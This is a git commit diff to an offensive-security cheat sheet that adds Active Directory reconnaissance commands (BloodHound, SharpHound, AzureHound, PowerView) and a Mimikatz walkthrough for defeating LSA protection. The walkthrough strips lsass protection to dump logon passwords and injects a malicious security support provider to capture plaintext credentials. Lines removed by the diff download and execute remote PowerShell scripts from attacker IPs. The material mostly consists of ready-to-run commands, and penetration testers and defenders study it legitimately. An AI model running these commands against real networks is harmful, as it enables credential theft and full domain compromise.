AD - Recon

2025-01-18 09:25:26 +00:00 · 2020-12-02 18:43:13 +01:00 · 2020-12-02 18:43:13 +01:00 · e13f152b74
commit e13f152b74
parent 3314f8bd99
2 changed files with 265 additions and 46 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -5,6 +5,10 @@
 - [Active Directory Attacks](#active-directory-attacks)
  - [Summary](#summary)
  - [Tools](#tools)
+  - [Active Directory Recon](#active-directory-recon)
+    - [Using BloodHound](#using-bloodhound)
+    - [Using PowerView](#using-powerview)
+    - [Using AD Module](#using-ad-module)
  - [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
    - [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
    - [CVE-2020-1472 ZeroLogon](#cve-2020-1472-zerologon)
@ -79,34 +83,6 @@
 * [InveighZero](https://github.com/Kevin-Robertson/InveighZero)
 * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
 * [Ranger](https://github.com/funkandwagnalls/ranger)
-* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
-
-  ```powershell
-  # start BloodHound and the database
-  root@payload$ apt install bloodhound #kali
-  root@payload$ neo4j console
-  root@payload$ ./bloodhound
-  Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
-  
-  # run the ingestor on the machine using SharpHound.exe
-  # https://github.com/BloodHoundAD/SharpHound3
-  .\SharpHound.exe (from resources/Ingestor)
-  .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
-  .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
-  .\SharpHound.exe -c all -d active.htb -SearchForest
-  .\SharpHound.exe --EncryptZip --ZipFilename export.zip
-  .\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
-
-  # or run the ingestor on the machine using Powershell
-  # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors
-  Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
-  Invoke-BloodHound -CollectionMethod All  -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
-
-  # or remotely via BloodHound Python
-  # https://github.com/fox-it/BloodHound.py
-  bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
-  ```
-
 * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
 * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)

@ -141,24 +117,6 @@
  ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
  ```

-* [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
-
-  ```powershell
-  # require: Install-Module -name Az -AllowClobber
-  # require: Install-Module -name AzureADPreview -AllowClobber
-  Connect-AzureAD
-  Connect-AzAccount
-  . .\AzureHound.ps1
-  Invoke-AzureHound
-  ```
-
-* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
-
-  ```powershell
-  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
-  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
-  ```
-
 * [ADRecon](https://github.com/sense-of-security/ADRecon)

  ```powershell
@ -204,6 +162,236 @@
    Show-LabDeploymentSummary
    ```

+## Active Directory Recon
+
+### Using BloodHound
+
+Use the correct collector
+* AzureHound for Azure Active Directory
+* SharpHound for local Active Directory
+
+use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
+
+```powershell
+# require: Install-Module -name Az -AllowClobber
+# require: Install-Module -name AzureADPreview -AllowClobber
+Connect-AzureAD
+Connect-AzAccount
+. .\AzureHound.ps1
+Invoke-AzureHound
+```
+
+use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
+
+```powershell
+# run the collector on the machine using SharpHound.exe
+# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
+.\SharpHound.exe (from resources/Ingestor)
+.\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
+.\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
+.\SharpHound.exe -c all -d active.htb -SearchForest
+.\SharpHound.exe --EncryptZip --ZipFilename export.zip
+.\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
+
+# or run the collector on the machine using Powershell
+# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
+Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
+Invoke-BloodHound -CollectionMethod All  -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
+
+# or remotely via BloodHound Python
+# https://github.com/fox-it/BloodHound.py
+pip install bloodhound
+bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
+```
+
+Then import the zip/json files into the Neo4J database and query them.
+
+```powershell
+root@payload$ apt install bloodhound 
+
+# start BloodHound and the database
+root@payload$ neo4j console
+root@payload$ ./bloodhound --no-sandbox
+Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
+```
+
+You can add some custom queries like [Bloodhound-Custom-Queries](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) from @hausec. Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
+
+
+### Using PowerView
+  
+- **Get Current Domain:** `Get-NetDomain`
+- **Enum Other Domains:** `Get-NetDomain -Domain <DomainName>`
+- **Get Domain SID:** `Get-DomainSID`
+- **Get Domain Policy:** 
+  ```
+  Get-DomainPolicy
+
+  #Will show us the policy configurations of the Domain about system access or kerberos
+  (Get-DomainPolicy)."system access"
+  (Get-DomainPolicy)."kerberos policy"
+  ```
+- **Get Domain Controlers:** 
+  ```
+  Get-NetDomainController
+  Get-NetDomainController -Domain <DomainName>
+  ```
+- **Enumerate Domain Users:** 
+  ```
+  Get-NetUser
+  Get-NetUser -SamAccountName <user> 
+  Get-NetUser | select cn
+  Get-UserProperty
+
+  #Check last password change
+  Get-UserProperty -Properties pwdlastset
+
+  #Get a spesific "string" on a user's attribute
+  Find-UserField -SearchField Description -SearchTerm "wtver"
+  
+  #Enumerate user logged on a machine
+  Get-NetLoggedon -ComputerName <ComputerName>
+  
+  #Enumerate Session Information for a machine
+  Get-NetSession -ComputerName <ComputerName>
+  
+  #Enumerate domain machines of the current/specified domain where specific users are logged into
+  Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
+  ```
+- **Enum Domain Computers:** 
+  ```
+  Get-NetComputer -FullData
+  Get-DomainGroup
+
+  #Enumerate Live machines 
+  Get-NetComputer -Ping
+  ```
+- **Enum Groups and Group Members:**
+  ```
+  Get-NetGroupMember -GroupName "<GroupName>" -Domain <DomainName>
+  
+  #Enumerate the members of a specified group of the domain
+  Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member
+  
+  #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
+  Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
+  ```
+- **Enumerate Shares**
+  ```
+  #Enumerate Domain Shares
+  Find-DomainShare
+  
+  #Enumerate Domain Shares the current user has access
+  Find-DomainShare -CheckShareAccess
+  ```
+- **Enum Group Policies:** 
+  ```
+  Get-NetGPO
+
+  # Shows active Policy on specified machine
+  Get-NetGPO -ComputerName <Name of the PC>
+  Get-NetGPOGroup
+
+  #Get users that are part of a Machine's local Admin group
+  Find-GPOComputerAdmin -ComputerName <ComputerName>
+  ```
+- **Enum OUs:** 
+  ```
+  Get-NetOU -FullData 
+  Get-NetGPO -GPOname <The GUID of the GPO>
+  ```
+- **Enum ACLs:** 
+  ```
+  # Returns the ACLs associated with the specified account
+  Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
+  Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
+
+  #Search for interesting ACEs
+  Invoke-ACLScanner -ResolveGUIDs
+
+  #Check the ACLs associated with a specified path (e.g smb share)
+  Get-PathAcl -Path "\\Path\Of\A\Share"
+  ```
+- **Enum Domain Trust:** 
+  ```
+  Get-NetDomainTrust
+  Get-NetDomainTrust -Domain <DomainName>
+  ```
+- **Enum Forest Trust:** 
+  ```
+  Get-NetForestDomain
+  Get-NetForestDomain Forest <ForestName>
+
+  #Domains of Forest Enumeration
+  Get-NetForestDomain
+  Get-NetForestDomain Forest <ForestName>
+
+  #Map the Trust of the Forest
+  Get-NetForestTrust
+  Get-NetDomainTrust -Forest <ForestName>
+  ```
+- **User Hunting:** 
+  ```
+  #Finds all machines on the current domain where the current user has local admin access
+  Find-LocalAdminAccess -Verbose
+
+  #Find local admins on all machines of the domain:
+  Invoke-EnumerateLocalAdmin -Verbose
+
+  #Find computers were a Domain Admin OR a spesified user has a session
+  Invoke-UserHunter
+  Invoke-UserHunter -GroupName "RDPUsers"
+  Invoke-UserHunter -Stealth
+
+  #Confirming admin access:
+  Invoke-UserHunter -CheckAccess
+  ```
+  :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \
+  I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him ->   
+  Profit!
+
+  [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
+
+### Using AD Module
+
+- **Get Current Domain:** `Get-ADDomain`
+- **Enum Other Domains:** `Get-ADDomain -Identity <Domain>`
+- **Get Domain SID:** `Get-DomainSID`
+- **Get Domain Controlers:** 
+  ```
+  Get-ADDomainController
+  Get-ADDomainController -Identity <DomainName>
+  ```
+- **Enumerate Domain Users:** 
+  ```
+  Get-ADUser -Filter * -Identity <user> -Properties *
+
+  #Get a spesific "string" on a user's attribute
+  Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
+  ```
+- **Enum Domain Computers:** 
+  ```
+  Get-ADComputer -Filter * -Properties *
+  Get-ADGroup -Filter * 
+  ```
+- **Enum Domain Trust:** 
+  ```
+  Get-ADTrust -Filter *
+  Get-ADTrust -Identity <DomainName>
+  ```
+- **Enum Forest Trust:** 
+  ```
+  Get-ADForest
+  Get-ADForest -Identity <ForestName>
+
+  #Domains of Forest Enumeration
+  (Get-ADForest).Domains
+  ```
+ - **Enum Local AppLocker Effective Policy:**
+ ```
+ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
+ ```
+
 ## Most common paths to AD compromise

 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -4,6 +4,7 @@

 * [Mimikatz - Execute commands](#mimikatz---execute-commands)
 * [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
+* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround)
 * [Mimikatz - Mini Dump](#mimikatz---mini-dump)
 * [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
 * [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
@ -58,6 +59,36 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
  * Adding requires lock
  * Removing requires reboot

+## Mimikatz - LSA Protection Workaround
+
+- LSA as a Protected Process
+  ```powershell
+  # Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
+  reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
+
+  # Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
+  #Now lets import the mimidriver.sys to the system
+  mimikatz # !+
+
+  # Now lets remove the protection flags from lsass.exe process
+  mimikatz # !processprotect /process:lsass.exe /remove
+
+  # Finally run the logonpasswords function to dump lsass
+  mimikatz # sekurlsa::logonpasswords
+  ```
+
+- LSA is running as virtualized process (LSAISO) by Credential Guard
+  ```powershell
+  # Check if a process called lsaiso.exe exists on the running processes
+  tasklist |findstr lsaiso
+
+  # If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
+  #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
+  mimikatz # misc::memssp
+
+  # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
+  ```
+

 ## Mimikatz - Mini Dump